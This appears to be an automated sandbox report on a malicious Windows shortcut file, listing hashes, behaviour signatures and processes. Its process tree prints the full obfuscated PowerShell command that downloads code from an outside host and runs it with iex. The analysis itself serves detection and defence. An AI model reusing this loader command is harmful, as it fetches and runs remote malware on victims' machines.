Analysis
-
max time kernel
142s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
15-09-2022 06:59
General
-
Target
7704683388.lnk
-
Size
1KB
-
MD5
f00bb79d2e4939d42d231bff01239359
-
SHA1
c85b872ed33f1fdbdc5ba0b20c52b09718593c92
-
SHA256
e5b5825b5bf7e37f4823559e810624561ababb4506170b67e90edc65019f97a8
-
SHA512
b1cc7de0d222f59aca56ee3d822152c2f9e1fac5e10efdd22785cac9edeb23b3021886592b1908e2ebac6fab5e9a3baa7d19bf55ee190c29d838c9e8fefe4d64
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\7704683388.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" --headless powershell @(1711,1724,1726,1708,1715,1711,1656,1726,1721,1722,1657,1666,1663)|foreach{$69lr=$69lr+[char]($_-1610)};$md2s='rl';new-alias j cu$md2s;.$([char](2208-2103)+'ex')(j -useb $69lr)2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell @(1711,1724,1726,1708,1715,1711,1656,1726,1721,1722,1657,1666,1663)|foreach{$69lr=$69lr+[char]($_-1610)};$md2s='rl';new-alias j cu$md2s;.$([char](2208-2103)+'ex')(j -useb $69lr)3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB